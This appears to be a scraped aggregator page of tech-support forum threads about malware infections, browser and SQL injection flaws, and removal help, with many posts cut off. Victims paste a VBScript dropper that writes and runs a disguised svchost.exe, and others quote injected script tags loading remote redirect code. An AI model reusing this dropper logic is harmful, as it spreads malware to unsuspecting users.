C:\PROGRA~1\McAfee\SPAMKI~1\MSKAgent.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\PROGRA~1\McAfee.com\PERSON~1\MpfTray.exe
C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
C:\Program Files\support.com\bin\tgcmd.exe
C:\Pro... Read more

A:Altnet is visiting me again

12 more replies
Answer Match 41.16%

I need some help--I believe my son 12 year old son is visiting inappropriate website while we are at work. At the end of the night I clean out the temporary internet folder to free up space on the computer and last night I was just scan the folder and found all kinds of porn websites!! So I clean it out and when I logged on this evening the sites he normally visits are there but so where other porn sites.

Tell if Im wrong but is it true that every website you visit is recorded in the temp internet folder? and so popups get space there and when those cookies automatically go there is the computer is just left on which is what he is trying to tell me.

So is there another way to find out a list of websites that have been visited.

I really need to get these questions asked.

Thanks
 

A:HELP-son maybe visiting XXX sites

15 more replies
Answer Match 41.16%

There is a rare problem in the Sims that seems only to affect my computer. The thread has 40-some views, but no replies, and I posted more than a week ago. Please help me!

Click on the text to go to the forum

Please help,
rothn
 

A:Nobody is visiting my forum

It means that no one has an answer! I know its unfortunate, but it does happen I am afraid
 

2 more replies
Answer Match 41.16%

Hey guys, I wanted to share this with you and hear your suggestions/opinions about this:

"In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine...."
Shellcode - Wikipedia, the free encyclopedia

Cracker's Choice

"....Buffer overflow has become one of the preferred attack methods for writers of viruses and Trojan horse programs....
QuickStudy: Buffer Overflow
On Windows Server 2008/Vista computers, it reduces the protection level of the computer, as it modifies the level of the Mandatory Integrity Control (MIC), leaving it low..."

Scanned with Avast, didn't find a thing, Malwarebytes results were (scanned and with a-squared after malwarebytes, nothing):

Trojan.Hiloti
Date spotted:
First seen on 2008-12-25.
Last seen on 2010-02-26.

Detection statistics:
This object is 0.05% of all objects detected.
1,403,342 instances detected worldwide.
Malwarebytes.org
Hiloti is a Trojan which downloads to the affected computer the adware detected as Lop.
Additionally, when users access through the Firefox browser certain websites related to search engines, they are redirected to malicious websites from which more malware will be downloaded.
What is Trojan Hiloti. Encyclopedia. Panda Security

Now, can that trojan be somehow connected with this buffer overflo... Read more

A:shellcode injection - buffer overflow atack

does your pc get back to a healthy state? or it still haunted with that hiloti?

3 more replies
Answer Match 41.16%

I need help from techies as I’m facing a strange issue where my browser redirects everytime to a malicious ad/website.
http://imgur.com/vqoBOP9
the browser opens a new page redirecting to hxxttp://hidcptqmerifcusymaqddcomolsujibeptsmycmqsrwgrcmywshgnfpjhcc.com/rot.aspx?partner=910345&f=popup-u
and then this redirects to some page on tradeexchange.com, buysellads.com etc
I will be glad if some techie can help me solve my problem. Adw Cleaner, MB Junkware Removal Tool couldn’t find anything neither did windows defender and MSE. Only KIS detects and blocks it but I need to get rid of this. Formatted my laptop since this problem was there earlier but still it is coming even after complete format. Please help me.

 
Please find this is my problem. It has a JS injection whenever I click anywhere on any website this site opens up which is blocked by my AV. There is some script hidden in my system somewhere which I'm not able to remove.
 
Please find attached my FST scan and ADWCleaner scan log in the post.
 
 

A:Need to remove JS injection Trojan virus permanently

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===Download Malwarebytes' Anti-Malware from HereDouble-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.Click the Scan tab at the top of the program window, select Threat Scan and click the Scan Now button.If you receive a message that updates are available, click the Update Now button (the update will be downloaded, installed, and the scan will start).The scan may take some time to finish,so please be patient.If potential threats are detected, ensure that Quarantine is selected as the Action for all the listed items, and click the Apply Actions button.While still on the Scan tab, click the link for View detailed log, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.The log is automatically saved by MBAM and can also be viewed by clicking the History tab and then selecting Application Log... Read more

8 more replies
Answer Match 41.16%

Last week my Windows XP Home edition was infected with the "System Tools" malware. I ran malware bytes and Gleary utilities and everything seemed ok. A few days later a couple of my servers were access via FTP (I guess my ftp info was stolen during the malware event). Many of my server files were injected with a line of code. My hosting company HostGator removed the injections and suggested that I run malwarebytes again as well as ComboFix. I just ran both but now see that a pair of expert eyes needs to look at the output log generated by ComboFix.

Is there anyone available to take a look?

If so, let me know if I should post it here or send vid PM.

Thanks.

A:Help with ComboFix report after Malware injection on my Server

Hello,Please follow the instructions in ==>This Guide<== starting at step 6.Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<== Since you have run ComboFix, please include the ComboFix log in the new topic. Please be sure to include a description of your computer issues and what you have done to try to resolve them.If you cannot produce any of the other logs, then please create the new topic anyway, include the information that you were unable to produce the other logs and why and include the ComboFix log along with a description of your computer issues.Orange Blossom

2 more replies
Answer Match 41.16%

I got infected by a trojan (I think) through downloading keygen. This disabled all my internet activities. I cannot go online at all.

Please see my log. Thanks for help in advance.


DDS (Version 1.1.0) - NTFSx86
Run by LamCHop at 21:22:47.87 on 20/12/2008
Internet Explorer: 7.0.5730.11 BrowserJavaVersion: 1.6.0_07
Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.503.256 [GMT -8:00]

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\system32\DVDRAMSV.exe
C:\PROGRA~1\PHAROS~1\Core\CTskMstr.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\WINDOWS\system32\ThpSrv.exe
C:\WINDOWS\system32\TODDSrv.exe
C:\WINDOWS\System32\alg.exe
"C:\WINDOWS\system32\svchost.exe"
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\00THotkey.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\WINDOWS\system32\thpsr... Read more

A:Trojan injection disabling connection to internet. Please help!!!

Hello, and welcome to TSF.

I am currently reviewing your log. I will be back with a fix for your problem as soon as possible.

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Please be patient with me during this time.

13 more replies
Answer Match 41.16%

Multiple Browser Injection Vulnerabilities (Secunia) In personally testing this, ALL 3 BROWSERS FAILED THE TEST (e.g., IE 6 SP1, Mozilla Firefox 1.0, and Opera 7.60 Beta). Hopefully all the vendors are working on this one, as the opportunities for phishing expeditions are certainly possible with this one BROWSER IMPACTED: Netscape 7.x, Konqueror 3.x, Opera 7.x, Safari 1.x, Microsoft Internet Explorer 5.01/5.5/6, Mozilla 0.x, Mozilla 1.0, Mozilla 1.1, Mozilla 1.2, Mozilla 1.3, Mozilla 1.4, Mozilla 1.5, Mozilla 1.6, Mozilla 1.7.x, Mozilla Firefox 0.x,Mozilla Firefox 1.xThe problem is that a website can inject content into another site's window if the target name of the window is known. This can e.g. be exploited by a malicious website to spoof the content of a pop-up window opened on a trusted website.Solution: Do not browse untrusted sites while browsing trusted sites.RELATED PRODUCT SITESNetscape: http://secunia.com/advisories/13402/Opera: http://secunia.com/advisories/13253/Mozilla: http://secunia.com/advisories/13129/IE: http://secunia.com/advisories/13251/Konqueror: http://secunia.com/advisories/13254/Safari: http://secunia.com/advisories/13252/Secunia has constructed a test, which can be used to check if your browser is affected by this issue:http://secunia.com/multiple_browsers_windo...erability_test/

A:Multiple Browser Injection Vulnerabilities (Secunia)

Firefox is indeed vulnerable,but i thought this was great.

3 more replies
Answer Match 41.16%

Quote:
One of the more bizarre architectural elements of HTML that may still be excused with the phrase, "This behavior is by design," is the ability for a floating text frame using the <IFRAME> element to be rendered effectively invisible (or so miniature as to not be seen), and then to run JavaScript code. It's a trigger for a disaster; and pressing that trigger tens of thousands of times today is a particularly virulent SQL injection attack, the evidence of which can be detected through a simple Google search: Wednesday afternoon, Betanews discovered about 82,800 compromised pages appearing in Google's index just for one of the actual malicious triggers...



more..

A:Latest SQL injection quickly spreads malicious JS

Thanks Aaron, hope it doesn't happen on my site.

1 more replies
Answer Match 41.16%

Recently, my upload speed and general computer speed has been quite low. Until today, I have not received any notifications from Avast. It is a different .exe each time I get the avast message.Basically,The virus is classified as Win32:Clicker-F [Trj] and it is in my temp folder.Each time I get the virus alert, it is a different file.The file is ctv1*****.exe - The * represent different numbers every time.The virus is classified as a trojan.EDIT: I removed a few processes in my process list that have been known to have virus issues. One in particular was called 0.232324445.exe (Not exactly the same, but numbers like that), I figured that just screamed bad, I google'd it, found nothing, so I delete it, it appeared to have stopped, for now at least. I will update this as I go along. If theres any other important things I should know, please post them. Thanks.EDIT 2: After checking, my upload speed, for files as small as 1mb, is still very slow. I checked on speedtest, and my internet speed is where it should be. I don't know why it is still so slow, maybe the virus is still here?Here is my HiJackThis log.QUOTELogfile of Trend Micro HijackThis v2.0.4Scan saved at 6:52:27 PM, on 09/07/2010Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v8.00 (8.00.6001.18702)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system... Read more

A:Continued virus injection? HiJackThis log inside

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process. Please also continue to work with me until I give you the all clear. Even if your computer appears to act better, you may still be infected.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.Once we start working together, please reply back within 3 days or this thread may be closed so we can help others who are waiting.We need to create an OTL report,Please download OT... Read more

2 more replies
Answer Match 41.16%

JavaScript Injection Attack.

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply "steal" a website's visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide.

IE (through ActiveX loopholes), and Firefox 1 and 2 are vulnerable to these attacks (read the article).

I suggest using Firefox 3 (latest is 3.0.1, soon to be 3.1) with the NoScript add-on to control what JavaScript you allow to execute on your computer.

-- Tom
 

More replies
Answer Match 40.74%

Hello wise ones,

I often have guests staying w/ me from around the world that I know little about other than intuition, what is on their profile and written references from other hosts. Through www.couchsurfing.com

I am very concerned letting them use my PC as they may download a virus or install a key logger. (Kapersky is installed and shows up under the guest identity on XP. But I think perhaps they could turn it off and bypass it?)

What would be the best way to allow them computer access?

1. Get an old PC for them to use? (if they are on my router can they access my other PC's personal information? If so how do I limit them from accessing my PC info?)

2. Install a software program like used at a Internet Cafe?

Any other ideas?

Kind Thanks!
 

A:Best PC Security with Visiting Guests?

8 more replies
Answer Match 40.74%

My company has 2 offices that operate total independent of each other. Each has their own domain. I have a VP that is usually in office B. Part of the time he is in Office A. His computer is part of office B domain and when he is in office A needs to use those printers and data on office A servers. How do I get that to work. He has Windows 10 Pro on his laptop.
 

More replies
Answer Match 40.74%

My sister in law is in town and I hooked her up to our router. At home she uses timewarner roadrunner as her ISP. Her Outlook is not sending mail while connected through my wireless. Nothing should have changed in her outgoing mail provider, at least that I know of, so why would connecting to my wireless mean she gets a failure to send in outlook? Any thoughts?
 

A:relative visiting and using wireless

16 more replies
Answer Match 40.74%

I was looking at our internet history and there are several sites on there and it seems no one is claiming visiting them. I want to believe that no one has been on these sites but I don't see any other way for them to appear on our internet history without someone viewing the site? Any ideas on how these got on there? Any possible way at all other than viewing the site....please, please help me. My trust and my marriage is potentially on the line here. I am looking for answers and I cannot think of anything, other than the worst. Any viruses or sites that hack into your computer and upload this stuff to your history, I know I'm grasping but I need answers. Please any thoughts at all?
 

A:Is there ANY way something could appear on your internet history without visiting?

6 more replies
Answer Match 40.74%

after visiting the site wowhead suddenly found that my cpu had multiple viruses, i removed them with zone alarm but it did not fix the problem with the desktop screen which now has a &quot;warning&quot; about viruses and trojans and that i should go get them fixed. there is also a bubble that appears which says something like &quot;your computer has been infected click this bubble to sort problem&quot;. and it tries to open an anti virus web page real-av.org even if i don't click the bubble. here is my hyjack this log Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 12:57:30 PM, on 6/12/2008 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Norton Utilities\NPROTECT.EXE C:\WINDOWS\system32\nvsvc32.exe C:\Program Files\Speed Disk\nopdb.exe C:\Program Files\Analog Devices\Core\smax4pnp.exe C:\WINDOWS\system32\RUNDLL32.EXE C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe C:\WINDOWS\system32\frmwrk32.exe C:\WINDOWS\system32\ctfmon.exe C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\mantispm.exe C:\WINDOWS\explorer.exe C:\WINDOWS\system32\notepad.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R1 - H... Read more

More replies
Answer Match 40.74%

The other day I was just following some links to a couple of sites, one was free6.com and the other nudeamateurhoes.com and now I have a weird icon on my taskbar. The icon itself says curse when moused over but has no way to exit the icon like the others on my task-bar.

Anyone every experience this problem and is it related to the sites or did I get it some other way.

Btw I did manage to find it and it in my programs folder and it is called curse.exe but when I try to delete it I am told I dont have access rights or something like that to delete this file.

Any help is greatly appreciated.

A:Problems after visiting sites!

Hello and welcome to TSF.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

1 more replies
Answer Match 40.74%

I have a smc router, and sometimes i need to change the ip address on my dmz zone to connect to xbox live games (or it takes forever to get into games). anyway, since yesterday i can't get into the devices webpage to change my settings, everytime i try it just keeps the "internet explorer cannot display webpage".
so im wondering if there is another way to change these settings? or why is it saying that? we had a storm yesterday so I figured maybe its down due to that, but i can't imagine it not being fixed as of yet.
thanks in advance.
 

A:is there a way to get into my router without visiting the webpage?

we had a storm yesterday so I figured maybe its down due to that,Click to expand...

It may have damaged the router
you could try resetting the router - there will be a reset button on the back, this will take it back to factory condition, however, that will mean resetting all the settings, and if it resets and still will not let you log into the router, then you will probably no longer have any internet access, as you can not set this up....

If you have the Setup CD that may have come with the router - you maybe able to access the settings via setup CD.
 

1 more replies
Answer Match 40.74%

Hi, thought I'd see if all is well on the folk's PC, since I'm not up close and personal with it like this often. For one thing I think the google toolbar entries are different than they are on other machines I have it on. (Mainly want to make sure nothing sinister is going on, but would also be interested in shutting off everything that can be. For example I did install Windows Messenger and enable Remote Assistance since we are going to try that when the need arises after I leave again, but assume I should figure out how to keep Windows Messenger from being on all the time. It's not enabled in msconfig or anything.)

Here's their log. We all thank you!

Logfile of HijackThis v1.99.1
Scan saved at 3:19:25 PM, on 9/3/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\devldr32.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\CA\eTrust PestPatrol\PPActiveDetection.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\System32... Read more

A:Mom & dad's HJT ok? Good kid checkin up while visiting! :)

P.S., I don't know if peop can tell when you've chosen about:blank as your IE start page on purpose, but I did. Although I wouldn't know how to tell if there was also a bad about:blank present. I did run Housecall, just a couple tribalfusion thingies found.
 

1 more replies
Answer Match 40.74%

Lots of people on social media sites like using URL shorteners to link people to different sites. Only problem I have with this, is that I cannot see the destination. Is there anything out there that can allow me to test a links' identity before visiting it?

A:Test URLs before visiting them?

I use this site: http://longurl.org/expand

3 more replies
Answer Match 40.74%

Hello,

I just uninstalled Farcry 2 (After finishing a version installed from legitimate DVD-ROM) through the Control panel on VISTA 32-bit. After the uninstall finished successfully, my Comodo firewall blocked a setup.exe file from initiating a 'buffer overflow attack' on explorer.exe from that setup.exe.

The setup.exe was digitally signed to Ubisoft according to properties, so I allowed it, then got a Comodo popup saying it was blocked and advising me to terminate the exe (explorer or setup.exe, I'm not sure which - explorer didn't visibly terminate afaik). The action in Comodo logs was a 'shellcode injection'. I don't think I'm infected as such, but can't find anything relating to this on the web - can anyone tell me what happened here or advise on what to do? I'm running virus-scans now but I'm a tech-noob and would appreciate any help. Apologies if I've posted in the wrong place, not sure where this issue goes tbh :-(

Thank you.

A:Shellcode injection/buffer overflow after uninstalling Farcry 2

To be on the safe side try these and post the logsWe Need to check for Rootkits with RootRepealDownload RootRepeal from the following location and save it to your desktop.Direct Download (Recommended)Primary MirrorSecondary MirrorSecondary MirrorSecondary MirrorZip Mirrors (Recommended if you have a slower connection or if the Direct Download mirror is down)
Primary MirrorSecondary MirrorSecondary MirrorRar Mirrors - Only if you know what a RAR is and can extract it.
Primary MirrorSecondary MirrorSecondary MirrorExtract RootRepeal.exe from the archive (If you did not use the "Direct Download" mirror).Open on your desktop.Click the tab.Click the button.Check all seven boxes: Push OkCheck the box for your main system drive (Usually C:), and press Ok.Allow RootRepeal to run a scan of your system. This may take some time.Once the scan completes, push the button. Save the log to your desktop, using a distinctive name, such as RootRepeal.txt. Include this report in your next reply, please.----------------------------------Please note: If Rootrepeal fails to run, try this step: Click Settings - Options. Set the Disk Access slider to HighAlso try: right-click on rootrepeal.exe and rename it to tatertot.scr======================Please download Win32kDiag.exe by AD and save it to your desktop.alternate download 1alternate download 2This tool will create a diagnostic report Double-click on Win32kDiag.exe to run and let it finish. When it states Finished! Press any ... Read more

1 more replies
Answer Match 40.74%

I make music on Audiotool.com but ever-since I downloaded a file I didn't want to, things went wacky. I found this in the page source info: <script src="http://us.clickscart.in/js/jquery-1.8.2.min.js" type="text/javascript"></script>
<script src="http://us.clickscart.in/js/redir.js" type="text/javascript"></script>
A similar problem to somebody else online... http://stackoverflow.com/questions/...-injection-in-browser?answertab=votes#tab-top
This script does not allow the app to load on the site (audiotool.com/app). Please, is there any way to fix this problem? A way to get rid of the Script and fix the way that site runs for me? Thanks.
 

A:Possible Cross Site Scripting, Javascript Injection Removal?

This is a web design issue, not a malware cleaning issue so moved to web design
 

4 more replies
Answer Match 40.74%

I'm trying to successfully deploy Windows 10 on a Dell OptiPlex 790 in my lab environment in order to push Windows 10 out to several of these PCs currently in production. Despite the fact that Dell does not offer a driver pack for Windows 10 for the 790, an upgrade to Windows 10 using the Windows Update method works fine; however, when I run a LiteTouch install, the keyboard and mouse do not work unless I am using a PS2 keyboard and mouse.

Upon further investigation, I found that the "USB Root Hub" device drivers are not properly installed on the deployed OptiPlex 790. My steps for a solution thus far have produced no meaningful results. I have tried the following:

1. From a working installation of Windows 10 on an OptiPlex 790, performed a full driver backup/export and imported into MDT 2013 Out-of-Box Driver folder for model-specific-injection task sequence. After deployment completed successfully with 0 errors and 0 warnings, the drivers are still not loaded and keyboard/mouse are nonfunctional.

2. Created an application package to silently install Intel Chipset during the LiteTouch OS installation, which includes the proper USB drivers for the OptiPlex 790. Results are the same; yet if I run the install after deployment, the drivers are installed successfully.

I'm just about out of ideas on this one, but I KNOW there has to be something that can work. It doesn't make sense that a manual install of the chipset can produce positive results but the same cannot... Read more

A:Deployment Issue - MDT 2013 / OptiPlex 790 / Driver Injection

I have a Dell OptiPlex 360 with Win10 and a Dell OptiPlex 755 with Linux Mint 17.2, both older and are the standard size cases. I've found with most computers that have the PS/2 ports also require a BIOS setting to Enable Legacy USB to get built-in support for USB 2.0 ports and USB keyboards and mice plugged into them. So far I've not seen BIOS support for USB 3.0 ports, have required software installed in/supported by the Operating System. Because of the change of some motherboards in leaving off the PS/2 ports I have changed my KVM from the PS/2 type to USB type.

1 more replies
Answer Match 40.74%

I make music on Audiotool.com but ever-since I downloaded a file I didn't want to, things went wacky. I found this in the page source info: <script src="http://us.clickscart.in/js/jquery-1.8.2.min.js" type="text/javascript"></script>
<script src="http://us.clickscart.in/js/redir.js" type="text/javascript"></script>
A similar problem to somebody else online... How to remove javascript file injection in browser? - Stack Overflow
This script does not allow the app to load on the site (audiotool.com/app). Please, is there any way to fix this problem? A way to get rid of the Script and fix the way that site runs for me? Thanks.

A:Possible Cross Site Scripting, Javascript Injection Removal?

Hi and Welcome to TSF!

I recommend you have our malware team help get rid of the javascript injection. Could have been a file that runs as an add-on. If no virus is found, please return here.

Please read all of the following instructions found here: NEW INSTRUCTIONS - Read This Before Posting For Malware Removal Help

After reading all of the instructions found above post the required logs in a new thread: Virus/Trojan/Spyware Help

Please note that the virus team is very busy and will get to you in due time. If you do not get a reply within 72 hours then you may bump the post.

Do not post any logs here!

2 more replies
Answer Match 40.74%

This is the strangest thing i've ever seen and there is NOTHING on google about it.

about two weeks about seemingly out of no where almost every subfolder on my D drive (not my main, my C drive is fine) has a folder in it that has been renamed to:

__rar_tmp

and I mean it's almost in every folder, it's completely broken all my steam games just because it breaks the directory. I'm guessing i'm out of luck because no one I have asked IT pro or not has not heard of this.

I have my D drive root set as my rar temp directory, but it's been that way for years and usually it only makes a few folders with names like $rar. So I have no idea if it's a trojan or what. If anyone has any ideas i'd love to hear it!

A:Bizarre folder injection issue (virus/trojan?)

Have you downloaded some sort of game that came through as an incomplete downloads or unzip, and caused the _rar_tmp files to appear?

I am not into any type of gaming, however, it appears there is no reputable information coming from the malware community on the issue you are having.

2 more replies
Answer Match 40.74%

HiI am unsure what is infecting my computer but it is adding the following script to all local html files whenever the computer restarts:<script Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A9"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>I tried to follow this topic:http://www.bleepingcomputer.com/forums/topic335436.htmlbut it was to messy for me to understand so im asking to start over.All the bestSagi.DDS Log:.DDS (Ver_2011-08-26.01) - NTFSx86 Internet Explorer: 8.0.7600.16385Run by Administrator at 23:28:27 on 2012-02-18Microsoft Windows 7 Ultimate 6.1.7600.0.1255.972.1033.18.2046.1111 [GMT 2:00].SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}.============== Running Processes ===============.C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\svchost.exe -k RPCSSC:\Windows\system32\sppsvc.exeC:\Windows\System32\svc... Read more

A:svchost.exe script injection into local html files

help!! ;/
i added GMER DDS and ATTACH .log s

3 more replies
Answer Match 40.74%

.

http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html

http://threatpost.com/en_us/blogs/new-firefox-flaw-enables-url-spoofing-code-injection-062210

A prominent security researcher has identified a problem with the way that Mozilla Firefox handles links that are opened in a new browser window or tab, enabling attackers to inject arbitrary code into the new window or tab while still keeping a deceptive URL in the browser's address bar.Click to expand...

.
 

A:New Firefox Flaw Enables URL Spoofing, Code Injection

6 more replies
Answer Match 40.74%

HiI am unsure what is infecting my computer but it is adding the following script to all local html files whenever the computer restarts:[codebox]&lt;script Language=VBScript><!--DropFileName = "svchost.exe"WriteData = "4D5A...00"Set FSO = CreateObject("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>[/codebox]I have run DDS and attached the log but I can only run GMER in safe mode; running normally I get a BSOD of 'bad pool header' type as soon as GMER starts running.Sorry this is vague; I have run MalwareBytes, Super AntiSpyware, SpyBot Search & Destroy, Advanced System Protector and A Squared Free.They all locate stuff which reappears every time the computer restarts. I ran all these programs after disconnecting to the internet.Thanks in advance and I would really appreciate any light you could shed on this - I haven't been able to find anything through Google of this issue.All the bestMike

A:svchost.exe script injection into local html files

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

25 more replies
Answer Match 40.74%

i have Intel(R) WiFi Link 5100 AGN wifi adapter and it doesn't support packet injection.
plzzzzzzzzzzz tell me about any patch file to resolve it. i want't to enable packet injectin on it. help me ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

A:Intel(R) WiFi Link 5100 AGN packet injection

  
Quote: Originally Posted by Ajk


i have Intel(R) WiFi Link 5100 AGN wifi adapter and it doesn't support packet injection.
plzzzzzzzzzzz tell me about any patch file to resolve it. i want't to enable packet injectin on it. help me ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,



As far as I know it doesnt and why do you want to do packet injection? we might be able to help with a work around
Ken

4 more replies